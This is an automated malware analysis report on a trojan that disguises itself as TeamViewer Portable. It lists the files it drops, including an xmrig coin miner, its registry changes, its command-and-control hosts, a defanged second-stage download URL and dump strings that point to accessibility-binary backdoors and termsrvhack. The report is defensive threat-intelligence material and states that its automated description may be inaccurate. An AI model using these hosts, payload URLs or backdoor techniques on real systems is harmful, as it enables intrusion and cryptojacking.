Gen.Variant.Graftor.340943_3834fb5cce

by malwarelabrobot on August 1st, 2017 in Malware Descriptions.

Gen:Variant.Graftor.340943 (BitDefender), UDS:DangerousObject.Multi.Generic (Kaspersky), Gen:Variant.Graftor.340943 (B) (Emsisoft), Gen:Variant.Graftor.340943 (FSecure), Gen:Variant.Graftor.340943 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 3834fb5cce08b127b14b5518cb57ecdc
SHA1: d704b2168f08b21a399ec01fc4b23daecc39cd98
SHA256: 3ec9f51db591906822ed608851a41d4f57693e75d6d9d4d5c077a3e6aa4eac50
SSDeep: 192:UNllR1cYY23ag8K8AvEpQkIVj7o893vbuYa0eia08MN1oynXboN0Qd63la3ZI:wlrDqg8R0qQvwivbwMN1xHQdO
Size: 24676 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-18 06:11:44
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

WerFault.exe:556
Iphgbnc.exe:3996
Picture.exe:4068
%original file name%.exe:3656

The Trojan injects its code into the following process(es):

Iphgbnc.exe:140
Iphgbnc.exe:4092

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process WerFault.exe:556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Temp\WER4E01.tmp.WERInternalMetadata.xml (51540 bytes)
C:\Windows\Temp\WER4DB2.tmp.appcompat.txt (3176 bytes)

The Trojan deletes the following file(s):

C:\Windows\Temp\WER4DB2.tmp (0 bytes)
C:\Windows\Temp\WER5987.tmp (0 bytes)
C:\Windows\Temp\WER4E01.tmp (0 bytes)
C:\Windows\Temp\WER4DB2.tmp.appcompat.txt (0 bytes)

The process Iphgbnc.exe:3996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\x[1].exe (434673 bytes)
C:\Picture.exe (442977 bytes)

The process Iphgbnc.exe:140 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\705A76DE71EA2CAEBB8F0907449CE086_C37EB0A02CA707BDA9677EF4ED9290A5 (1 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1480 bytes)
C:\Windows\Temp\TarAA15.tmp (2712 bytes)
C:\Windows\Temp\CabAA14.tmp (48 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\705A76DE71EA2CAEBB8F0907449CE086_C37EB0A02CA707BDA9677EF4ED9290A5 (1464 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1 bytes)

The Trojan deletes the following file(s):

C:\Windows\Temp\TarAA15.tmp (0 bytes)
C:\%original file name%.exe (0 bytes)
C:\Windows\Temp\CabAA14.tmp (0 bytes)

The process Picture.exe:4068 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\xmrig\svchost.exe (6841 bytes)

The process %original file name%.exe:3656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Mysqld\NetSyst96.PNG (118569 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\NetSyst96[1].dll (115321 bytes)
%Program Files%\Microsoft Iphgbn\Iphgbnc.exe (52 bytes)

Registry activity

The process WerFault.exe:556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Rpc]
"UuidSequenceNumber" = "134429773"

[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\ObjectTable\145]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000055E1]
"145" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\ObjectTable\145]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\LruList\0000000000000579]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore]
"_CurrentObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\LruList\0000000000000579]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Debug]
"ExceptionRecord" = "05 00 00 C0 00 00 00 00 00 00 00 00 00 00 00 00"

[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\LruList]
"CurrentLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\ObjectTable\145\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000055E1" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\ObjectTable\145]
"_FileId_" = "Type: REG_QWORD, Length: 8"

The process Iphgbnc.exe:3996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\System\CurrentControlSet\services\Wsrags xnzeepsk]
"ConnectGroup" = "Ãƒâ€žÃ‚Â¬ÃƒË†ÃƒÂÃ‚Â·Ãƒâ€“Ãƒâ€”ÃƒÂ©"

[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"
"WpadDecisionTime" = "00 43 99 6C 19 0A D3 01"

[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 39 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\services\Wsrags xnzeepsk]
"Description" = "Copyright(C) 2012. All Rights Reserved."

[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASMANCS]
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process Iphgbnc.exe:140 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\System\CurrentControlSet\services\Wsrags xnzeepsk]
"MarkTime" = "2017-07-31 19:24"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\System\CurrentControlSet\services\Wsrags xnzeepsk]
"DeleteFiles"

The process Picture.exe:4068 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\WinHelps]
"Description" = "Windows H"

The process %original file name%.exe:3656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "60 E6 13 6C 19 0A D3 01"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"

[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"

[HKLM\System\CurrentControlSet\services\Wsrags xnzeepsk]
"DeleteFiles" = "c:\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "60 E6 13 6C 19 0A D3 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASAPI32]
"EnableConsoleTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

Dropped PE files

MD5	File path
5c83328ad8f922e650ce183c1709c75a	c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\x[1].exe
5c83328ad8f922e650ce183c1709c75a	c:\Users\"%CurrentUserName%"\AppData\Roaming\xmrig\svchost.exe
4df96d091f8b938be25a8af94dddbdcf	c:\Windows\Temp\svchsot.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: PortableAppZ.blogspot.com
Product Name: TeamViewer Portable
Product Version: 0.0.0.0
Legal Copyright: Bernat
Legal Trademarks: PortableAppZ is a Trademark of Bernat
Original Filename: TeamViewerPortable.exe
Internal Name: TeamViewer Portable
File Version: 0.0.0.0
File Description: TeamViewer Portable
Comments: Allows TeamViewer to be run from a removable drive. For additional details, visit http://portableappz.blogspot.com
Language: Chinese (Simplified, PRC)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	7090	8192	4.08984	8e3d0e62c2ba7b42050f1ed41b71d68b
.rdata	12288	3412	4096	2.98192	a9fec56b4db3033e67080071a5532343
.data	16384	3112	4096	1.42152	4587d70cb5ed44479eb785df9606d1e2
.rsrc	20480	2792	4096	2.55498	2b9fd2c6cecc7b70253f5428e72ed4f6

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://nds.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=12345678
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8=
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFkLoIvOqXUlJdYHL2zDUkA=
hxxp://nds.qzone.qq.com/?s_url=http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=12345678
hxxp://i.qq.com/?s_url=http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=12345678	203.205.151.50
hxxp://s2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8=	23.37.43.27
hxxp://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=12345678	203.205.151.50
hxxp://ss.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFkLoIvOqXUlJdYHL2zDUkA=	23.37.43.27
pool.minexmr.com	94.23.8.105
qingxiaofeng.f3322.org	180.97.221.181

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET TROJAN Single char EXE direct download likely trojan (multiple families)
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFkLoIvOqXUlJdYHL2zDUkA= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ss.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.10.2

Content-Type: application/ocsp-response

Content-Length: 1609

content-transfer-encoding: binary

Cache-Control: max-age=332630, public, no-transform, must-revalidate

Last-Modified: Fri, 28 Jul 2017 12:47:59 GMT

Expires: Fri, 4 Aug 2017 12:47:59 GMT

Date: Mon, 31 Jul 2017 16:24:44 GMT

Connection: keep-alive
0..E......>0..:.. .....0..... 0..'0........{.*.s....p...D .P...2017
0728124759Z0s0q0I0... ..........d.....k... P.....d.._`.a.U..C..`*..z.C
....Y.....u%%../l.R@....20170728124759Z....20170804124759Z0...*.H.....
........L.J..u.......v.f.......>insVf.K@.@"R....\7......Xp.......].
1.4V..$q\..%$ }RL6...q.&R... ....5{9..W.b......3L.)...>.i$x........
.R.. ....Q.-Vg;M..vQ.....G[.4.M..Y4.[...5.0A.Rsz..FoMrs..d..W...O.O..H
s.E.../-....TyP..}]{m.......<.....q..P.5.f."w......H.$.O.......n0..
j0..f0..N.......c.qD....b..Y$X..0...*.H........0~1.0...U....US1.0...U.
...Symantec Corporation1.0...U....Symantec Trust Network1/0-..U...&Sym
antec Class 3 Secure Server CA - G40...170716000000Z..171014235959Z0@1
>0<..U...5Symantec Class 3 Secure Server CA - G4 OCSP Responder0
.."0...*.H.............0........."..>.d(c.!.. ...P!.4.O.>.-s.^..
e.{...D....."e."......z.5.}.q..m&...x.7.S8.?h..M3a...ryH.K..J46..h....
..fh.|].........d..Y.@.Z>...........?...q.....k.....H...cv.F.j.j...
}......H...W..9......%.I.......u....#.M.....".\.(v.!.~.?..Z.=.7.......
;...p.&H|.V.[.............0...0... .....0......0"..U....0...0.1.0...U.
...TGV-E-21150...U.#..0..._`.a.U..C..`*..z.C..0...U........{.*.s....p.
..D .P.0...U.......0.0n..U. .g0e0c..`.H...E....0T0&.. .........hXXp://
VVV.symauth.com/cps0*.. .......0...  hXXp://VVV.symauth.com/rpa0...U.%
..0... .......0...U...........0...*.H..................~b....)..5..1.p
..J...^...\..%.niK.........S.....j[...b...o......3#.U[........4^...p..
.i..=......fO..-D.^...q.......(.f..:"4.."7z...1".Y.F..yyv.....x.ii<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: s2.symcb.com


HTTP/1.1 200 OK

Server: nginx/1.10.2

Content-Type: application/ocsp-response

Content-Length: 1763

content-transfer-encoding: binary

Cache-Control: max-age=328689, public, no-transform, must-revalidate

Last-Modified: Fri, 28 Jul 2017 11:38:15 GMT

Expires: Fri, 4 Aug 2017 11:38:15 GMT

Date: Mon, 31 Jul 2017 16:24:38 GMT

Connection: keep-alive
0..........0..... .....0......0...0.......WI.....L.c=...r..7Z..2017072
8113815Z0s0q0I0... ...................B.>.I.$&.....e......0..C9...3
13..Q?.t8p.4@A.0........20170728113815Z....20170804113815Z0...*.H.....
.........I..:......../LHO.......c......"..7i.[...(....N.'N........l.t.
...Jfb{1......;`.|.*m.L..!.p-.!J{Or\...(..&..83..*r6...X..X.(........R
R8.-..@....6\....m.<.WU.1;.Gc85..V...c...` r.Q....j..3..K....V...V@
....pQ.. |v....'...o1....r....N.F...i..8...O!U...qF...$.c....0...0...0
..........^..)......<...T.0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 Ve
riSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 P
ublic Primary Certification Authority - G50...161122000000Z..171214235
959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec
 Trust Network1?0=..U...6Symantec Class 3 PCA - G5 OCSP Responder Cert
ificate 50.."0...*.H.............0.............................m..|...
.....1rUZN.b.......t. d......O...NY.lR..k .Q.z.g.4(,...Rp.7...0C.j.)Z.
....... ~..3...x.b.-..... S^0<6...!.(..2}...T.fX}...6...(...1...#..
H..|`.yy.<B.z.q$......u.-..K.!......y..8..--....?.,.[.[...5.e.4....
.D..t.;....).J....\fV..G.........0...0...U.......0.0l..U. .e0c0a..`.H.
..E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...http:
//VVV.symauth.com/rpa0...U.%..0... .......0...U...........0... .....0.
.....0"..U....0...0.1.0...U....TGV-OFF-500...U.......WI.....L.c=...r..
7Z0...U.#..0.....e......0..C9...3130...*.H.............<wN..g..<<< skipped >>>

GET /fcg-bin/cgi_get_portrait.fcg?uins=12345678 HTTP/1.1

Host: users.qzone.qq.com


HTTP/1.1 301 Moved Permanently

Server: stgw/1.2.9.3_1.11.1

Date: Mon, 31 Jul 2017 16:24:30 GMT

Content-Type: text/html

Content-Length: 192

Connection: keep-alive

Location: hXXps://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=12345678
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>stgw/1.2.9.3_1.11.1</center>..</body>..</html>
..HTTP/1.1 301 Moved Permanently..Server: stgw/1.2.9.3_1.11.1..Date: M
on, 31 Jul 2017 16:24:30 GMT..Content-Type: text/html..Content-Length:
 192..Connection: keep-alive..Location: hXXps://users.qzone.qq.com/fcg
-bin/cgi_get_portrait.fcg?uins=12345678..<html>..<head><
;title>301 Moved Permanently</title></head>..<body b
gcolor="white">..<center><h1>301 Moved Permanently</
h1></center>..<hr><center>stgw/1.2.9.3_1.11.1<
/center>..</body>..</html>....

GET /?s_url=http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=12345678 HTTP/1.1

Connection: Keep-Alive

Host: i.qq.com

Cookie: uin=; skey=


HTTP/1.1 200 OK

Date: Mon, 31 Jul 2017 16:24:47 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: TSW/Node.js

Cache-Control: no-cache

Vary: Origin, Accept

Mod-Map: platform_loginQzone:hybrid/app/platform/loginQzone/sync/sync.js
eba..    .    <!doctype html>.    <html>.        <head&
gt;.            <meta charset="UTF-8" />.            <meta ht
tp-equiv="content-type" content="text/html; charset=UTF-8" />.     
       <meta http-equiv="X-UA-Compatible" content="IE=edge">.   
         <title>QQ......-...........................</title&g
t;.            <meta name="keywords" content="QQ......,qzone,......
,......,......,......,......,......,......,......,qq......,qq......,..
..........,............" />.            <meta name="description"
 content="QQ......(Qzone)....................................QQ.......
......................................................................
......................................................................
.............................................QQ.......................
......................................................................
............................................................" />.  
          <link rel="apple-touch-icon" href="hXXps://qzonestyle.gti
mg.cn/qzone/v8/index/touch-icon-ipad-retina.png">.            <l
ink rel="apple-touch-icon" sizes="76x76" href="hXXps://qzonestyle.gtim
g.cn/qzone/v8/index/touch-icon-ipad.png">.            <link rel=
"apple-touch-icon" sizes="120x120" href="hXXps://qzonestyle.gtimg.cn/q
zone/v8/index/touch-icon-iphone-retina.png">.            <link r
el="apple-touch-icon" sizes="152x152" href="hXXps://qzonestyle.gtimg.c
n/qzone/v8/index/touch-icon-ipad-retina.png">.            <l<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

Iphgbnc.exe_4092:

.text

`.rdata

@.data

.rsrc

SSSSh

MFC42.DLL

MSVCRT.dll

_acmdln

GetProcessHeap

KERNEL32.dll

USER32.dll

Misql.exe

hXXp://180.97.221.181:64430/NetSyst96.dll

BcURlIB69hyFN7hYNmGysFYX3L0S6NMd3GYB1H8YTyhsOn24CaWTyZRx Nje4bdm1VpLMo94X3tKtShUB6rztFJVTCr46WR sL83/MrpMN/iLykL8rmehO54UJ SS/zGK1flwMdZAOigz5zxYHaIypxZF4MHgf0PgHdKNLLO3Cx/8VG7UKlMyR6AFXDtJa29lV6D9lYwlzrBC0vnBNswaDTy08rJXOP/Bw0qi1n 0PkQVqErH M5SkXfx/7smTRn39769hYKEW3LbKZEca/FRPfj8Bmkzul43H60Xw5RY5EQa4jeaWcgzHlT2JSkPMprWVhSL4zEFe/j5Vga9AWLrL5aCNIjJdyanpzfrlvRu2KOFY4tGwQlwJ  T4XAz7yn7PFjQGa6vfl/AlMCchhpuo9494uT4b pbtPKguWvYwKANhoot0/YDZxQ6jM9ZC618MpC1lFOu8BeayfAbidwOPywOxSUdy2gszCz6eTP dPgUP8QoTKGLjvHjCunxlxmvx48QnsK2tASuIV56egB8pkPAkdamot5Mz8MT5M=

%Program Files%\Mysqld\

Mysqld/1.0

WININET.dll

ch2=%d

ch1=%d

%Program Files%\Mysqld\NetSyst96.PNG

Allows TeamViewer to be run from a removable drive. For additional details, visit hXXp://portableappz.blogspot.com

PortableAppZ.blogspot.com

TeamViewer Portable

0.0.0.0

PortableAppZ is a Trademark of Bernat

TeamViewerPortable.exe

Iphgbnc.exe_4092_rwx_10001000_00348000:

D$%SS

t;Jt%UQJPSt

@43434343

Jw2.Hw

deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly

inflate 1.1.4 Copyright 1995-2002 Mark Adler

This software is derived from the GNU GPL XviD codec (1.3.0).

Software\Microsoft\Windows\CurrentVersion\run

\StringFileInfo\%s\CompanyName

000%x

Software\Microsoft\Windows\CurrentVersion\Run

%d * %d:

(%d-d-d d:d:d)

<%s> %s

%d.%d.%d.%d

Ourlog

%s\*.*

%s%s%s

%s%s*.*

%Y-%m-%d %H:%M

%s : %u

InternalGetUdpTableWithOwnerPid

AllocateAndGetUdpExTableFromStack

InternalGetTcpTable2

AllocateAndGetTcpExTableFromStack

%d-%d-%d %d:%d:%d

hXXp://

\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat

\Local Settings\History\History.IE5\index.dat

%Y-%m-%d %H:%M:%S

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

\*.url

%sDocuments and Settings\%s\Favorites

%sUsers\%s\Favorites

192.168.1.2

GET %s HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0

Referer: hXXp://%s:80/hXXp://%s

:] %s

:] %d-%d-%d %d:%d:%d

%s\dllcache\magnify.exe

%s\dllcache\osk.exe

%s\dllcache\sethc.exe

%s\magnify.exe

%s\osk.exe

%s\sethc.exe

\dllcache\termsrvhack.dll

\termsrvhack.dll

